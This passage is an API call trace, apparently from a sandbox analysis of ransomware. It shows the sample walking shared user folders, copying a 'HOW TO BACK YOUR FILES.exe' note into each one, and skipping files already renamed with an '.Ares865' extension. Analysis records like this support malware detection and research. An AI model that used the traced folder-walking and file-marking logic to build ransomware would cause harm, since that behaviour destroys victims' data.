ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.360] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.360] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.361] lstrcpyW (in: lpString1=0x2cce488, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0090.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.361] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x334fc8 [0090.361] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.361] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0090.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.361] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.361] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 73 [0090.361] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0090.361] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.361] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\assistance\\client\\1.0\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.361] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.362] GetLastError () returned 0x0 [0090.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.362] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.362] CloseHandle (hObject=0x120) returned 1 [0090.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.362] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.362] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x67156600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67156600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.362] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.362] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.362] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_CValidator.H1D.Ares865" | out: lpString1="Help_CValidator.H1D.Ares865") returned="Help_CValidator.H1D.Ares865" [0090.362] lstrlenW (lpString="Help_CValidator.H1D.Ares865") returned 27 [0090.362] lstrlenW (lpString="Ares865") returned 7 [0090.362] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.362] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_MKWD_AssetId.H1W.Ares865" | out: lpString1="Help_MKWD_AssetId.H1W.Ares865") returned="Help_MKWD_AssetId.H1W.Ares865" [0090.362] lstrlenW (lpString="Help_MKWD_AssetId.H1W.Ares865") returned 29 [0090.362] lstrlenW (lpString="Ares865") returned 7 [0090.362] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_MKWD_BestBet.H1W.Ares865" | out: lpString1="Help_MKWD_BestBet.H1W.Ares865") returned="Help_MKWD_BestBet.H1W.Ares865" [0090.363] lstrlenW (lpString="Help_MKWD_BestBet.H1W.Ares865") returned 29 [0090.363] lstrlenW (lpString="Ares865") returned 7 [0090.363] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_MTOC_help.H1H.Ares865" | out: lpString1="Help_MTOC_help.H1H.Ares865") returned="Help_MTOC_help.H1H.Ares865" [0090.363] lstrlenW (lpString="Help_MTOC_help.H1H.Ares865") returned 26 [0090.363] lstrlenW (lpString="Ares865") returned 7 [0090.363] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_MValidator.H1D.Ares865" | out: lpString1="Help_MValidator.H1D.Ares865") returned="Help_MValidator.H1D.Ares865" [0090.363] lstrlenW (lpString="Help_MValidator.H1D.Ares865") returned 27 [0090.363] lstrlenW (lpString="Ares865") returned 7 [0090.363] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help_MValidator.Lck.Ares865" | out: lpString1="Help_MValidator.Lck.Ares865") returned="Help_MValidator.Lck.Ares865" [0090.363] lstrlenW (lpString="Help_MValidator.Lck.Ares865") returned 27 [0090.363] lstrlenW (lpString="Ares865") returned 7 [0090.363] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpyW (in: lpString1=0x2cce494, lpString2="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865" | out: lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865") returned="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865" [0090.363] lstrlenW (lpString="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q.Ares865") returned 54 [0090.363] lstrlenW (lpString="Ares865") returned 7 [0090.363] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.363] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Favorites", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Favorites") returned="C:\\Users\\All Users\\Application Data\\Favorites" [0090.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0090.363] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.363] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Favorites") returned 45 [0090.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Favorites" | out: lpString1="C:\\Users\\All Users\\Application Data\\Favorites") returned="C:\\Users\\All Users\\Application Data\\Favorites" [0090.364] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.364] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Favorites\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\favorites\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.364] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.364] GetLastError () returned 0x0 [0090.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.364] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.364] CloseHandle (hObject=0x120) returned 1 [0090.364] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.365] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.365] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Favorites\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498632e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498632e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.365] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.366] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.366] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents") returned="C:\\Users\\All Users\\Application Data\\Documents" [0090.366] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0090.367] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0090.367] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents") returned 45 [0090.367] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents") returned="C:\\Users\\All Users\\Application Data\\Documents" [0090.367] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.367] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.367] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.368] GetLastError () returned 0x0 [0090.368] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.368] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.368] CloseHandle (hObject=0x120) returned 1 [0090.368] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.368] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.368] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53342a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53342a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.368] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.368] lstrcpyW (in: lpString1=0x2cce45c, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.368] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.368] lstrlenW (lpString="Ares865") returned 7 [0090.368] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.369] lstrcpyW (in: lpString1=0x2cce45c, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2d2f68 [0090.369] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0090.369] lstrcpyW (in: lpString1=0x2cce45c, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1608 [0090.369] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0090.369] lstrcpyW (in: lpString1=0x2cce45c, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2d2fe0 [0090.369] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.369] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Videos") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Videos" [0090.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0090.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.369] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Videos") returned 55 [0090.369] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Videos" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Videos") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Videos" [0090.369] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.369] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.370] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.370] GetLastError () returned 0x0 [0090.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.370] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.370] CloseHandle (hObject=0x120) returned 1 [0090.370] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.370] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.371] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.371] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.371] lstrcpyW (in: lpString1=0x2cce470, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.371] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.371] lstrlenW (lpString="Ares865") returned 7 [0090.371] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.371] lstrcpyW (in: lpString1=0x2cce470, lpString2="Sample Videos" | out: lpString1="Sample Videos") returned="Sample Videos" [0090.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0090.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x320fc8 [0090.371] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0090.371] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos" [0090.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0090.371] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos") returned 69 [0090.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos" [0090.371] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.371] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.372] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.372] GetLastError () returned 0x0 [0090.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.372] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.372] CloseHandle (hObject=0x120) returned 1 [0090.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.372] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.372] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.373] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.373] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.373] lstrcpyW (in: lpString1=0x2cce48c, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.373] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.373] lstrlenW (lpString="Ares865") returned 7 [0090.373] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.373] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Wildlife.wmv.Ares865" | out: lpString1="Wildlife.wmv.Ares865") returned="Wildlife.wmv.Ares865" [0090.373] lstrlenW (lpString="Wildlife.wmv.Ares865") returned 20 [0090.373] lstrlenW (lpString="Ares865") returned 7 [0090.373] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.373] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures" [0090.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0090.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0090.373] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures") returned 57 [0090.373] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures" | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures" [0090.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.374] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.374] GetLastError () returned 0x0 [0090.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.374] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.374] CloseHandle (hObject=0x120) returned 1 [0090.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.374] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.374] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.374] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.375] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.375] lstrcpyW (in: lpString1=0x2cce474, lpString2="desktop.ini.Ares865" | out: lpString1="desktop.ini.Ares865") returned="desktop.ini.Ares865" [0090.375] lstrlenW (lpString="desktop.ini.Ares865") returned 19 [0090.375] lstrlenW (lpString="Ares865") returned 7 [0090.375] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.375] lstrcpyW (in: lpString1=0x2cce474, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0090.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0090.375] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x334fc8 [0090.375] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0090.375] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Users\\All Users\\Application Data\\Documents\\My Pictures\\Sample Pictures" [0090.375] HeapFree (in: hHeap=0x2b0000, 